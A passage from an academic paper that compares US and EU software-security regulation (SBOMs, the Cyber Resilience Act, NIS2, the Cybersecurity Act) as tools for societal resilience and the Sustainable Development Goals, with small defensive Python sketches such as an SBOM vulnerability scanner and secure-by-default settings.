In terms of resilience, this shift is crucial. The erosion of trust in digital systems often stems not from a single catastrophic failure, but from the quiet normalization of unmanaged risks passed down to end-users. Community strength in the digital age, therefore, begins with limiting this exposure at its source. Here, transparency tools like the Software Bill of Materials (SBOM) (U.S. National Telecommunications and Information Administration (NTIA) 2021) become more than a technical requirement; they are a precondition for civic trust. As scholars like Carmody et al. (2021) argue in the context of healthcare, the transparency provided by an SBOM is a foundational element for building resilient supply chains. By enabling rapid identification of vulnerabilities in critical medical devices, SBOMs contribute directly to patient safety and the overall resilience of the healthcare system, reinforcing institutional trust. This logic extends beyond healthcare: mandating such transparency across sectors enables proactive risk management, which is a direct, tangible contribution to societal resilience.
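To indicate how SBOM transparency becomes operational, the sketch below walks a CycloneDX-style JSON document (the ‘components’ array is part of the published CycloneDX schema) and flags entries with known advisories. The advisory table here contains a single hard-coded illustrative entry for the Log4Shell case; a real deployment would query a maintained vulnerability database rather than a local dictionary.

import json

# Known-affected component versions, as might be drawn from an advisory
# feed; here a single illustrative entry for Log4Shell (CVE-2021-44228).
ADVISORIES = {("log4j-core", "2.14.1"): "CVE-2021-44228"}

def flag_vulnerable_components(sbom_path: str) -> list[str]:
    """Scan a CycloneDX-style JSON SBOM and report components whose
    name and version match a known advisory."""
    with open(sbom_path) as f:
        sbom = json.load(f)
    findings = []
    for comp in sbom.get("components", []):
        key = (comp.get("name", ""), comp.get("version", ""))
        if key in ADVISORIES:
            findings.append(f"{key[0]} {key[1]}: {ADVISORIES[key]}")
    return findings

This is precisely the rapid-identification capacity that Carmody et al. (2021) highlight for medical devices: an operator who holds an SBOM can answer “are we affected?” in minutes rather than weeks.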
The regulatory logic outlined above not only reframes how markets operate; it also serves, indirectly but intentionally, as a tool for advancing the Sustainable Development Goals (SDGs). Cybersecurity labeling, for instance, promotes informed technology choices and helps foster digital literacy among users, which ties directly into the goal of quality education (SDG 4.4 and 4C). The transparency of update cycles and long-term vendor support, along with baseline requirements for suppliers, contribute to the reliability of digital infrastructure. They further encourage innovation in the security domain and help advance objectives in industry, innovation, and resilient infrastructure (SDG 9 and 9C). Strengthened supplier accountability and regulatory feedback mechanisms (for example, consequences for non-compliance with risk mitigation protocols) can also help reduce systemic vulnerability and cybercrime. In this sense, they align with the broader goal of promoting peaceful, just, and inclusive societies (SDG 16.1 and 16.6). These regulatory interventions are thus not only technical in nature; they also carry social and political weight. A secure digital ecosystem is not an end in itself but a means toward the long-term goal of societal sustainability.
It is equally important to recognize that the impact of legal instruments is not uniform across social groups or institutional environments. A metropolitan hospital’s cybersecurity infrastructure and protocols bear little resemblance to the informal practices of a rural school or the limited IT resources of a municipal water utility. In each case, the demand for digital security carries a different weight. Where in-house development teams exist, compliance with federal requirements may be a matter of internal alignment; where a lone IT administrator manages a fragmented system, the same regulation can become a structural burden. Even seemingly neutral mandates, such as updating obligations or SBOM integration, impose asymmetrical costs depending on institutional scale, capacity, and access to expertise. These differences directly affect how resilience can be realized in practice.
Hence, the true center of gravity for building social resilience lies not in centralized distribution but in decentralized adaptability. Schools, hospitals, local governments, and civic hubs can only respond effectively to cyber threats when their tools, skills, and regulatory templates are allowed to connect organically. In such settings, security is not a static condition but a mode of operation defined by trust relations, accessibility, and the internal balance of adaptation. A regulation that demands rigid, one-size-fits-all compliance risks reinforcing vulnerability rather than alleviating it. Resilience does not unfold from central blueprints but takes shape in places where the rules can bend just enough to fit the people. If regulation does not leave room for difference, it will not hold where support is thin, leading to failure where it is needed most.
From this perspective, the third pillar of the U.S. cybersecurity strategy, centered on the redistribution of responsibility, can be seen as a practical enactment of the resilience-by-design principle. Requirements for secure software development, mandatory SBOM use, and greater supply chain transparency are not defensive measures added post hoc; they are built into the architecture from the design stage onward. In this framework, protection is not layered on from the outside; it is embedded in how the system is supposed to work a priori. The logic here follows what the socio-technical model has long suggested: security is not just about shielding the technical layer. It is about building environments where the technical, the human, and the institutional are designed to support one another. That shift matters. It is what allows someone without advanced digital skills to still interact with a system safely, and that is not a small consideration. It is where regulation begins to touch everyday experience and where the digital divide, however persistent, becomes just a bit less steep. Security and social adaptability are not separate ambitions; they are part and parcel of the same operational architecture.
What emerges here is not a technocratic strategy but a redistributive one, with risk returning to where power resides. This logic of relocating digital burdens from vulnerable users to dominant producers is what ties cybersecurity policy to broader questions of societal resilience. Not every country has the leverage to do this; however, for those that do, the message is clear: resilience is not stoicism. It is design.

4.2. The EU Regulatory Approach: Cybersecurity as Infrastructure for Embedding Societal Resilience

Since the 2020s, the concept of societal resilience has been gaining prominence in the European Union’s security and regulatory discourse. The link between cybersecurity and democratic governance is more than just a new policy perspective; it signals a deeper paradigm shift. The security of the digital environment can no longer be addressed exclusively as a technological or national security challenge. Instead, access to safe digital spaces, the digital competencies and participatory capacities of citizens, and the governance of platform-based threats collectively strengthen the broader resilience of society, not only in technical terms but politically and culturally as well. This approach also reflects a social–technological model of governance in which technical regulation and societal inclusion are treated as mutually reinforcing components of public resilience. At the same time, these measures serve multiple Sustainable Development Goals, particularly SDG 5 (Gender Equality), SDG 10 (Reduced Inequalities), and SDG 16 (Peace, Justice, and Strong Institutions).
The EU’s 2020 Cybersecurity Strategy (European Commission 2020) explicitly identifies digital security as a cornerstone of societal resilience. What makes this document novel is its reframing of cybersecurity, not simply as a technological or security policy issue, but as one intimately linked with fundamental rights, the functioning of democratic institutions, and the social preconditions of both green and digital transitions. One of its recurring conceptual anchors is “resilience,” which it interprets not merely as systemic resistance but, albeit indirectly, as a function of civic engagement, public awareness, and educational access.
Significantly, the strategy promotes the principle of “security by design” not only for critical infrastructure and services but also for the planning of digital tools, workplaces, and platforms, framing this as a technological precondition of social resilience. Secure software is not just a technical matter but a question of who we trust to shape the systems we live with. By placing responsibility for security and vulnerability management on developers and manufacturers, the strategy draws a direct line between code and constitutional values. It suggests that public trust does not begin in the courtroom or the ballot box, but in the reliability of the digital tools people use every day. In that sense, safe digital environments and everyday cyber hygiene are not peripheral, they are what make participation possible, what hold cohesion together.
The strategy leaves no doubt: cybersecurity is not an isolated goal; it is a foundational condition for sustainable development and for preserving what the EU holds as its core values: freedom, democracy, and the rule of law. However, the path to this realization is not paved with firewalls and compliance checklists alone. The fight against disinformation, the response to hybrid threats, the investment in digital literacy, and the specific protection of women and children are not simply discrete policy fields; they are the contour lines of a broader political ambition. What emerges is the image of a society that is not only digitally equipped but socially grounded in civic responsiveness, an image of European digital citizenship. It is in this context that the alignment with the Sustainable Development Goals becomes more than symbolic: SDG 5 and SDG 16 are not footnotes to this project; they are intrinsic to its architecture. A secure and inclusive digital space is not merely desirable but a prerequisite to both gender equality and democratic coexistence.
The 2025 Internal Security Strategy (ProtectEU) (European Commission 2025) carries this logic forward, sharpening it, expanding it, and embedding it more deeply into the EU’s institutional reflexes. The document’s starting point is unambiguous: cybersecurity is not just a technical terrain but one of the structural foundations of social resilience. The proposed responses are layered (legal, technological, and civic), mirroring the hybrid nature of the threats themselves. Software security, in particular, emerges in this strategy not simply as a technical parameter but as a structural fault line that traverses the digital infrastructure at large. What is really at stake here is not just whether the code is strong enough, but whether the systems we rely on every day can be trusted to hold. In that sense, the move toward mandatory development protocols and certification is not just a matter of tightening the rules; it is a way of asking: who bears responsibility when things fail? And how do we build systems that do not just function, but deserve our trust?
This is where the EU’s dual approach, combining the Cyber Resilience Act with the NIS2 Directive (European Parliament and Council 2022), becomes critical. While the CRA focuses on the security of digital products themselves (‘security of the technology’), the NIS2 Directive mandates a high level of cybersecurity risk management for the crucial entities that deliver our society’s essential services, from healthcare to energy (‘security through the technology’). By expanding its scope and imposing stricter security and reporting obligations on a wider range of sectors, NIS2 aims to bolster the resilience of the EU’s critical infrastructure as a whole (Vandezande 2024; Lucini 2023). Together, these regulations form a comprehensive architecture designed to secure both the digital tools and the societal functions that depend on them, thereby contributing to overall societal resilience (Longo et al. 2025).
They do not just demand safety; they require it to be premeditated, engineered, lived. The strategy also frames the Digital Services Act as a key instrument in this shift, portraying it as a tool that draws platform governance out of the realm of private discretion and into the domain of public accountability. Digital security, in this view, is no longer a question of best intentions; it is a condition of democratic life and civic acceptance and must be treated as such.
The significance of the 2025 Internal Security Strategy lies not only in what it regulates, but in how it reimagines resilience. Societal cohesion is treated not as an abstract ideal, but as a fragile construct threatened by online radicalization, hate speech, and the erosion of shared truths. The measures proposed extend beyond only technical corrections or crisis-mitigation protocols. The updated strategy sets in motion a shift in posture, marking a dramatic turn from passive containment to active structural anticipation. Digital crisis frameworks, reinforced protections for children, and new accountability mandates for platforms are not ad hoc solutions; they are early markers of a proactive governance model. In this reframing, security becomes less a reaction to breaches and more a proactive precondition for ensured civic continuity.
Equally crucial is the focus on skills and awareness, particularly among those least shielded from threats and harm: children, women, and minorities. This is not incidental. It is the practical expression of the resilience-by-design principle: the idea that a society does not become resilient through firewalls alone, but through inclusive, participatory, and self-aware democratic formation. In this way, the strategy aligns not only with SDG 5 and SDG 16 but also with SDG 10, treating the reduction of inequalities not as a by-product but as a directed governing imperative. What takes shape here is a social–technological model in its truest sense. The new model presents cybersecurity frameworks, legal safeguards, and cultural norms not as separate logics but as interdependent layers of the same democratic structure. It is precisely this layered interdependence that allows digital resilience to become what it was meant to be: societal.
It is worth briefly examining how the cybersecurity-related legislative acts referenced in these strategies, particularly those concerning software security, contribute to the objectives outlined above.
The Cybersecurity Act (European Parliament and Council 2019) does not just introduce a certification regime; it reframes cybersecurity as a structural element of democratic governance. By anchoring ENISA as a permanent agency with strategic and operational mandates, the regulation elevates digital security from a technical policy field to a matter of institutional continuity. What emerges is a governance model in which cybersecurity is not isolated from the broader political fabric but embedded within the architecture of public trust and social resilience.
The creation of a unified EU certification framework marks a subtle but significant shift. This move is widely analyzed in the literature as a key instrument for harmonizing the fragmented digital single market and fostering trust by creating a transparent, EU-wide standard for security assurance, particularly for a wide range of ICT products and services (Hernández-Ramos et al. 2021; Khurshid et al. 2022). While formally voluntary, the layered logic of the Act suggests a long-term trajectory: one in which certified security becomes the normative standard, not an exception. The text places repeated emphasis on “security by design” and “security by default,” not as abstract engineering ideals, but as systemic expectations, signalling to developers and manufacturers that software vulnerabilities are not merely technical oversights, but potential threats to civic stability.
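To give these systemic expectations a concrete shape, the brief sketch below illustrates one possible reading of “secure by default” at the level of code: every default in a hypothetical device configuration is the safe choice, so that an integrator who changes nothing still ships a hardened product. The names and parameters are our own illustration, not drawn from the Act or from any real product.

```python
from dataclasses import dataclass, field
import secrets


@dataclass
class DeviceConfig:
    """Hypothetical device configuration illustrating 'secure by default':
    every default is the safe choice, so an integrator who changes nothing
    still ships a hardened product."""
    tls_enabled: bool = True    # encrypted transport on by default
    auto_updates: bool = True   # patches applied without user action
    remote_debug: bool = False  # risky interfaces off unless explicitly enabled
    admin_password: str = field(
        # a per-device random secret instead of a shared factory password
        default_factory=lambda: secrets.token_urlsafe(16)
    )

    def weaken(self, **overrides):
        """Deviating from safe defaults must be explicit and auditable."""
        for key, value in overrides.items():
            print(f"WARNING: overriding secure default {key!r} -> {value!r}")
            setattr(self, key, value)


config = DeviceConfig()            # safe without any security expertise
config.weaken(remote_debug=True)   # insecure choices leave a visible trace
```

The design choice mirrors the regulatory logic: safety requires no expertise from the user, while weakening the product requires a deliberate, traceable act.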
This link between a technical flaw and societal-level disruption is now a well-documented phenomenon. As scholarly analyses of major cyber incidents show, modern societies’ reliance on interconnected critical infrastructures creates a fertile ground for cascading failures. A single software vulnerability, whether in an energy grid or a hospital’s IT system, can be exploited to trigger widespread service interruptions, causing significant economic damage and eroding the public’s trust in essential institutions (Riggs et al. 2023). These risks are particularly acute in the context of the software supply chain, where a vulnerability in a single third-party component can be inherited by countless systems, enabling large-scale, stealthy attacks that undermine the entire digital ecosystem (Tan et al. 2025). The concept of ‘civic stability’, therefore, is no longer separable from the operational integrity of the digital systems that underpin it.
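The inheritance effect described above can be illustrated with a toy dependency graph: a single flawed low-level component is silently contained in every system that depends on it, directly or transitively. The system and component names below are invented; only the fan-out pattern matters.

```python
# Toy dependency graph: which systems transitively inherit a flawed component?
# All names are illustrative placeholders.
DEPENDS_ON = {
    "hospital-ehr": ["report-engine"],
    "energy-scada-ui": ["report-engine", "auth-lib"],
    "report-engine": ["log-lib"],
    "auth-lib": [],
    "log-lib": [],
}

def inherits(system: str, flawed: str) -> bool:
    """True if `system` depends on `flawed`, directly or transitively."""
    stack = list(DEPENDS_ON.get(system, []))
    seen = set()
    while stack:
        dep = stack.pop()
        if dep == flawed:
            return True
        if dep not in seen:
            seen.add(dep)
            stack.extend(DEPENDS_ON.get(dep, []))
    return False

exposed = [s for s in DEPENDS_ON if inherits(s, "log-lib")]
print(exposed)  # every system that silently inherits the flaw in log-lib
```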
Applying the socio-legal perspective outlined in our methodology, the Act speaks the language of resilience, even if not explicitly stated. It ties the reliability of digital services to the social preconditions of democratic participation. It links trust in infrastructure to the rule of law and aligns, however implicitly, with the aims of SDG 16: building peaceful, inclusive institutions in a digital age. In addressing the security of essential services, the Act also resonates with SDGs 5 and 10 by setting conditions under which women, children, and marginalized users can access technology without disproportionate risk. Cybersecurity, in this frame, is no longer the shield behind the system; it becomes part of the system’s protective exoskeleton.
The Cyber Resilience Act (CRA) (European Parliament and Council 2024), in particular, represents a cornerstone of this new regulatory philosophy and has spurred significant scholarly debate. Existing academic analyses highlight the Act’s profound impact on market dynamics and legal obligations. Much of this research understandably focuses on the practical challenges of implementation, such as the new compliance burdens and potential liabilities for developers, especially within the open-source software ecosystem (Colonna 2025). Other scholars emphasize the complexities of its legal enforcement and the crucial role of harmonized European standards in making the framework operational (Kamara 2024; Shaffique 2024).
While these economic and legal perspectives are vital, a central theme also emerging in the literature is the CRA’s role in engineering a fundamental shift in responsibility, moving accountability for security from consumers to producers (Shaffique 2024). Some analyses have even begun to explore whether the regulation’s architecture serves a deeper purpose of protecting fundamental rights, albeit implicitly (Chiara 2025).
Our analysis builds on and extends these insights. While acknowledging the importance of the legal and economic dimensions, we contribute a novel perspective by focusing specifically on how this reconfiguration of responsibility functions as a socio-technical mechanism aimed at building societal resilience. We argue that by embedding security obligations directly into the product lifecycle and holding manufacturers accountable, the CRA not only addresses technical vulnerabilities but also tackles systemic societal issues like the protection of vulnerable users and the promotion of digital equity. It is this explicit connection between technical mandate and social outcome that we explore in the following sections.
The Cyber Resilience Act does more than lay out technical specifications; it sketches a political vision of digital trust. By setting horizontal cybersecurity requirements for all products with digital elements, it weaves security not just into the design of devices, but into the architecture of collective resilience. The principles of “secure by design” and “secure by default” function here not as engineering preferences, but as structural conditions for maintaining societal confidence in an increasingly complex digital public sphere.
The Act’s approach to achieving this is fundamentally structural, a point increasingly recognized in scholarly analyses. Recognizing that many users lack sufficient technical understanding (Recital 1), the regulation shifts the burden of security away from the individual and places it firmly on the manufacturer (Shaffique 2024). This responsibility is embedded across the entire lifecycle of a device, reframing digital safety from a static feature at launch to an evolving, long-term commitment. Regular updates, transparent vulnerability reporting, and accountable patch management are no longer mere best practices but legally mandated conditions for maintaining the social contract on which digital trust depends. This ‘secure-by-design’ logic effectively addresses user vulnerability without demanding that users become cybersecurity experts, a move some scholars see as a form of “protection of fundamental rights in disguise” (Chiara 2025). Reporting duties, too, are reframed as instruments of collective defence. The requirement to notify both national authorities and ENISA of major incidents and exploited vulnerabilities reflects a governance logic that is no longer reactive, but anticipatory. Transparency and coordinated response are no longer mere virtues; they are baseline expectations of digital maturity.
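To make this anticipatory reporting logic tangible, the sketch below shows what a machine-readable early warning for an actively exploited vulnerability might contain. The structure and field names are our own assumption for illustration; the CRA prescribes the duty, the recipients, and the deadlines, not this particular format.

```python
import json
from datetime import datetime, timezone

# Illustrative early-warning payload for an actively exploited vulnerability.
# Field names are our own sketch, not the official CRA reporting schema.
notification = {
    "report_type": "early_warning",
    "product": {"name": "ExampleSensorHub", "version": "3.2.1"},  # hypothetical
    "vulnerability": {
        "summary": "authentication bypass in local API",
        "actively_exploited": True,
        "cve_id": None,  # may not yet be assigned at the early-warning stage
    },
    "detected_at": datetime.now(timezone.utc).isoformat(),
    "recipients": ["national CSIRT", "ENISA"],  # the Act's dual notification logic
    "planned_mitigation": "emergency patch in preparation",
}

print(json.dumps(notification, indent=2))
```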
While the Cyber Resilience Act’s primary function is to set enforceable technical standards, its underlying logic, as detailed in its preamble, extends significantly beyond mere technical compliance. The regulation is built upon the explicit acknowledgement of a fundamental power and knowledge asymmetry, noting the “insufficient understanding and access to information by users” (Recital 1). It also directly addresses the societal impact on vulnerable consumers, pointing to products “such as toys and baby monitoring systems” (Recital 10) and demonstrating a clear legislative intent to protect those least able to protect themselves.
To counteract these disparities, the CRA mandates structural safeguards. It requires that user information be “clear, understandable, intelligible and legible” and provided in a “language which can be easily understood by users” (Article 13(18)), directly targeting barriers related to digital literacy and language. Furthermore, the regulation’s vision of resilience is tied to broader societal capacity, promoting measures to create a cybersecurity workforce that is “inclusive, also in terms of gender” (Recital 23).
Therefore, while terms like ‘civic inclusion’ or ‘digital equity’ may not appear in the operative articles, the CRA’s foundational principles are demonstrably designed to mitigate structural inequalities by shifting the burden of security from the individual user to the manufacturer. By creating a safer digital environment for all, irrespective of technical skill or vulnerability, the Act’s framework resonates with the core ambitions of SDG 10 (Reduced Inequalities) and SDG 16 (Peace, Justice, and Strong Institutions). Similarly, while not a primary objective, the stated aim of fostering an inclusive workforce (Recital 23) shows a legislative awareness that is consistent with the principles of SDG 5 (Gender Equality).
At the same time, the regulation’s concept of resilience also extends to the user side. The information that manufacturers are obliged to disclose, such as product security features, support duration, and update availability, is intended to strengthen the awareness behind user choices. In this framework, societal resilience does not mean shielding end-users as passive recipients of protection, but enabling their active and informed participation. This reinforcement of individual decision-making capacity contributes directly to the overall security and safety of the community.
The CRA thus exemplifies a social–technological model of resilience, in which legal obligation, technical design, and civic inclusion are no longer separable domains but interdependent elements of a common digital future.
Beyond the principles embedded in its recitals, perhaps the CRA’s most tangible contribution to sustainability and social resilience is found in its lifecycle support obligations. By mandating that manufacturers provide security updates for a product’s expected lifetime (a period often anticipated to be around five years for many consumer devices), the regulation directly counters the logic of planned obsolescence. This requirement not only enhances security over time but also promotes environmental sustainability by extending the useful life of digital products, thereby reducing electronic waste in line with SDG 12 (Responsible Consumption and Production). Crucially, this mechanism also serves a clear socio-technical purpose, as outlined in the regulation’s preamble. By linking a manufacturer’s liability to the failure to provide security updates (Recital 31), the CRA addresses the dual problems of inconsistent security practices and the information asymmetry faced by users (Recital 1). This shifting of responsibility from the end-user to the producer is a direct intervention designed to protect less digitally literate consumers, thus reinforcing the regulation’s role in fostering digital equity.
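The operational core of this obligation is simple enough to state in a few lines. The sketch below, assuming the five-year support horizon mentioned above, checks whether a fielded product is still inside the window during which security updates are owed; the actual period under the CRA depends on the product’s expected lifetime, so the constant is an illustrative assumption.

```python
from datetime import date, timedelta

# Assumed five-year support horizon; the real period is product-specific.
SUPPORT_PERIOD = timedelta(days=5 * 365)

def in_support_window(placed_on_market: date, today: date) -> bool:
    """True while the manufacturer is still obliged to ship security updates."""
    return today <= placed_on_market + SUPPORT_PERIOD

print(in_support_window(date(2022, 3, 1), today=date(2025, 6, 1)))  # True
print(in_support_window(date(2018, 3, 1), today=date(2025, 6, 1)))  # False
```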
Based on the strategies and legislative acts examined, it becomes clear that the European Union seeks to do more than merely defend against threats in the digital sphere; it aims to actively shape how that sphere is embedded within society. Cybersecurity, particularly the regulation of software security, is treated not only as an end in itself but also as a means: a regulatory lever through which technological reliability becomes a structural precondition for social cohesion, civic participation, and institutional trust. This approach is not technocratic, but normative and inclusive: the security of the digital environment is conceptualized as a configurable component of societal resilience. The alignment with SDGs 5, 10, and 16 is not simply rhetorical; it is substantive and operational. The EU’s vision of resilience is built on reducing digital inequalities, reinforcing inclusive institutions, and universalizing access to digital security. What emerges, therefore, is not just a defensive framework, but a proactive social–technological model that doubles as a tool for shaping the future democratic fabric of digital society.

4.3. Converging Principles and the Socio-Technical Imperative in Cybersecurity Regulation

Although the EU and the U.S. rely on different legal architectures and specific regulatory instruments (such as the Cyber Resilience Act, Cybersecurity Act, Executive Order 14028 (2021), and SBOM-related requirements), this study reveals a converging core insight across both jurisdictions: digital safety extends beyond mere operational continuity to encompass the preservation of civic trust. Both regulatory landscapes demonstrate a move towards incorporating the principles of “resilience by design” and “security by design” in a structured manner. While security by design aims to prevent attacks, resilience by design ensures that systems can endure them. The former builds the walls; the latter makes sure the structure holds even if a wall is breached. The regulations we examine are pushing for both: systems that are robustly defended, yet fundamentally resilient.
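The contrast can be made concrete in a short, admittedly stylized sketch: input validation stands in for security by design (building the wall), while a cached fallback stands in for resilience by design (holding together when the wall is breached anyway). All function names and the simulated failure below are illustrative assumptions, not drawn from either regulatory text.

```python
def query_backend(user_id: str) -> str:
    raise TimeoutError("backend unreachable")  # simulate the wall being breached

def secure_lookup(user_id: str) -> str:
    # Security by design: reject malformed input before it reaches the backend.
    if not user_id.isalnum():
        raise ValueError("rejected: malformed identifier")
    return query_backend(user_id)

def resilient_lookup(user_id: str, cache: dict) -> str:
    # Resilience by design: a backend outage degrades the answer, not the service.
    try:
        result = secure_lookup(user_id)
        cache[user_id] = result
        return result
    except TimeoutError:
        return cache.get(user_id, "temporarily unavailable, please retry")

print(resilient_lookup("alice42", cache={"alice42": "last known record"}))
```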
This convergence is key to aligning cybersecurity regulation with broader goals of what can be termed sustainable civic development. This is not merely a theoretical linkage; a growing body of scholarly work now explicitly frames cybersecurity as a fundamental pillar for sustainable development.
As systematic reviews of the literature demonstrate, the connection extends across multiple dimensions. Economically, robust cybersecurity protects the critical infrastructure necessary for stable growth (Morales-Sáenz et al. 2024). Socially, it safeguards personal data and fosters the public trust essential for equitable digital access. This contribution to building strong, reliable institutions and protecting public access to information is increasingly seen as a direct enabler of SDG 16 (Kuday 2024). By strengthening institutional trust and protecting vulnerable populations, cybersecurity governance therefore becomes an indispensable tool for building a more durable and equitable civic foundation in the digital age.
This normative repositioning of software security, as identified in both the U.S. and EU contexts, transcends the mere re-regulation of the digital sector. It points towards the necessity of designing governance models that deliberately integrate technological and societal dimensions. This represents a significant shift: it is not that traditional security controls have always implicitly served resilience, but rather that new regulatory pressures are forcing a deliberate reframing of security itself. The move towards mandatory ‘security by design’ and transparent vulnerability management marks a structural change where security is no longer just about building walls, but about designing systems that can function gracefully under pressure—the operationalization of resilience through policy. The analysis underscores that an integrated, socio-technical model—one that accounts for the interplay between technology, institutions, and social practices—is uniquely capable of operationalizing the conditions for societal resilience through software security, not as an after-the-fact intervention, but as a built-in mode of operation. The failure to respond adequately to software threats, as illustrated by the Log4Shell or Equifax incidents, is not just a technical or data protection lapse; it signals a breakdown in this socio-technical fabric and erodes public trust. Meaningful regulation, therefore, must structure not only obligations for developers but also empower the rights, awareness, and agency of end users.
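The Log4Shell episode also shows the practical payoff of the SBOM requirements discussed earlier: an organization holding a machine-readable component inventory can answer “which of our products ship an affected log4j-core?” as a mechanical query rather than a weeks-long audit. In the sketch below, the product names are invented, and the vulnerable version range follows the widely published advisories (fixed from release 2.15.0 onward).

```python
# Sketch: an SBOM-derived inventory turns incident response into a query.
# Product names are hypothetical; a real scanner would consult a live
# vulnerability database rather than a hard-coded version threshold.
inventory = [
    {"product": "ReportServer", "component": "log4j-core", "version": "2.14.1"},
    {"product": "EdgeGateway", "component": "log4j-core", "version": "2.17.2"},
    {"product": "BillingApp", "component": "slf4j-api", "version": "1.7.36"},
]

def parse(version: str) -> tuple:
    """Naive numeric version parse; sufficient for this dotted-release example."""
    return tuple(int(part) for part in version.split("."))

def affected_by_log4shell(entry: dict) -> bool:
    return entry["component"] == "log4j-core" and parse(entry["version"]) < (2, 15, 0)

for entry in inventory:
    if affected_by_log4shell(entry):
        print(f"PATCH NEEDED: {entry['product']} ships log4j-core {entry['version']}")
```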

4.4. Comparative Overview

The following table (Table 1) compares the cybersecurity legislative frameworks in the EU and the US, focusing on the distribution of responsibilities, obligations towards users, and the approach to the SDGs.
The European Union takes a holistic approach, assigning clear cybersecurity duties to all stakeholders in the digital product lifecycle. National regulators play an active enforcement role. Transparency, long-term support, and user communication are legally required, and sustainability goals are woven into the legal framework.
The United States emphasizes the security of federal systems, with agencies and their suppliers required to meet defined cybersecurity standards. While transparency and rapid response are important, the legislation is less explicit about sustainability or consumer protection, focusing instead on safeguarding government interests and supply chain integrity.

5. Conclusions

5.1. Main Findings and Implications

What this study ultimately shows is that the way software security is regulated has a profound influence on a society’s ability to withstand stress and disruption. One of the most important insights we arrived at is that maintaining reliable and trustworthy digital systems is not simply a technical obligation. It is a clear signal of institutional responsibility, and it connects directly to the goals set out in SDG 16, which calls for peace, justice, and strong institutions.
Our findings also bring attention to the relevance of SDG 5 on gender equality and SDG 10 on reducing inequalities, especially when we consider who tends to bear the greatest share of digital risks. Ensuring security in digital environments cannot be reduced to technical excellence alone. It also means making sure that people can engage with digital systems in fair and secure ways. This is especially important for those who are often placed at a disadvantage, such as women, children, the elderly, and marginalized communities. In this sense, resilience is not only about the durability of systems, but about the capacity of a society to respond to threats together, through mechanisms that are inclusive and participatory.
What we argue, then, is that cybersecurity regulation designed with resilience in mind and shaped by a socio-technical understanding can go far beyond risk mitigation. It can actively contribute to building a society that is more just, more equal, and more capable of facing future challenges in a collective way.

5.2. Limitations and Avenues for Future Research

This study does not aim to measure resilience quantitatively or assess regulatory effectiveness in statistical terms. Rather, it offers an interpretive exploration of how legal and policy frameworks embed normative expectations around societal resilience.
Looking ahead, there is still much we do not know. This study focused on the EU and the US, but it is important to examine how similar ideas might work in other parts of the world. Do these kinds of rules actually hold up in different settings? Do they make a difference for people in their daily lives? It would be helpful to follow how these approaches play out over time, in different sectors and communities, to understand what really works and what might need to change.

Author Contributions

Conceptualization, R.K. and Á.M.; methodology, R.K., B.B. and M.M.; validation, R.K., J.S., Á.M., J.C., B.B. and M.M.; formal analysis, R.K., J.S., Á.M., J.C., B.B. and M.M.; investigation, R.K., J.S., Á.M., J.C., B.B. and M.M.; data curation, R.K., J.S., Á.M., J.C., B.B. and M.M.; writing—original draft preparation, R.K., J.S., Á.M., J.C., B.B. and M.M.; writing—review and editing, R.K., J.S., Á.M., J.C., B.B. and M.M.; visualization, R.K., B.B. and M.M.; supervision, R.K., J.S. and B.B.; project administration, R.K. All authors have read and agreed to the published version of the manuscript.

Funding

Author R.K. was supported by the EKÖP-24-4-II-SZE-72 University Research Fellowship Program of the Ministry for Culture and Innovation from the source of the National Research, Development and Innovation fund. The APC was funded by Széchenyi István University.

Institutional Review Board Statement

Not applicable.

Informed Consent Statement

Not applicable.

Conflicts of Interest

The authors declare no conflicts of interest. The funders had no role in the design of the study; in the collection, analyses or interpretation of data; in the writing of the manuscript; or in the decision to publish the results.

References

  1. Aldaajeh, Saad, Husam Saleous, Sulaiman Alrabaee, Elhadj Barka, Frank Breitinger, and Kim-Kwang Raymond Choo. 2022. The role of national cybersecurity strategies on the improvement of cybersecurity education. Computers & Security 119: 102754. [Google Scholar] [CrossRef]
  2. Alghawli, Ali, and Tetyana Radivilova. 2024. Resilient Cloud cluster with DevSecOps security model, automates a data analysis, vulnerability search and risk calculation. Alexandria Engineering Journal 107: 136–49. [Google Scholar] [CrossRef]
  3. Andrade, Ricardo, Javier Torres, Isabel Ortiz-Garcés, Jorge Miño, and Luis Almeida. 2023. An exploratory study gathering security requirements for the software development process. Electronics 12: 3594. [Google Scholar] [CrossRef]
  4. Aziz, Khaldoun, Ameen Daoud, Anjali Singh, and Mohammed A. Alhusban. 2025. Integrating digital mapping technologies in urban development: Advancing sustainable and resilient infrastructure for SDG 9 achievement—A systematic review. Alexandria Engineering Journal 116: 185–207. [Google Scholar] [CrossRef]
  5. Bellovin, Steven M. 2023. Is Cybersecurity Liability a Liability? IEEE Security & Privacy 21: 99–100. [Google Scholar] [CrossRef]
  6. Boss, Steven R., Julie R. Gray, and Diane J. Janvrin. 2024. Be an Expert: A Critical Thinking Approach to Responding to High-Profile Cybersecurity Breaches. Issues in Accounting Education 39: 93–113. [Google Scholar] [CrossRef]
  7. Brewster, Thomas. 2016. Crooks Behind $81M Bangladesh Bank Heist Linked to Sony Pictures Hackers. Available online: https://www.forbes.com/sites/thomasbrewster/2016/05/13/81m-bangladesh-bank-hackers-sony-pictures-breach/ (accessed on 20 June 2024).
  8. Cañizares, Javier, Sam Copeland, and Neelke Doorn. 2021. Making Sense of Resilience. Sustainability 13: 8538. [Google Scholar] [CrossRef]
  9. Carmody, Seth, Andrea Coravos, Ginny Fahs, Audra Hatch, Janine Medina, Beau Woods, and Joshua Corman. 2021. Building resilient medical technology supply chains with a software bill of materials. Npj Digital Medicine 4: 34. [Google Scholar] [CrossRef]
  10. Cavelty, Myriam Dunn, Carina Eriksen, and Björn Scharte. 2023. Making cyber security more resilient: Adding social considerations to technological fixes. Journal of Risk Research 26: 513–27. [Google Scholar] [CrossRef]
  11. Chai, Wesley. 2022. Confidentiality, Integrity and Availability (CIA Triad). Available online: https://www.techtarget.com/whatis/definition/Confidentiality-integrity-and-availability-CIA (accessed on 20 June 2024).
  12. Chiara, Pier Giorgio. 2025. Understanding the Regulatory Approach of the Cyber Resilience Act: Protection of Fundamental Rights in Disguise? European Journal of Risk Regulation 16: 469–84. [Google Scholar] [CrossRef]
  13. Colabianchi, Silvia, Francesco Costantino, Giulio Di Gravio, Flavio Nonino, and Riccardo Patriarca. 2021. Discussing resilience in the context of cyber physical systems. Computers & Industrial Engineering 160: 107534. [Google Scholar] [CrossRef]
  14. Colonna, Liane. 2025. The end of open source? Regulating open source under the cyber resilience act and the new product liability directive. Computer Law & Security Review 56: 106105. [Google Scholar] [CrossRef]
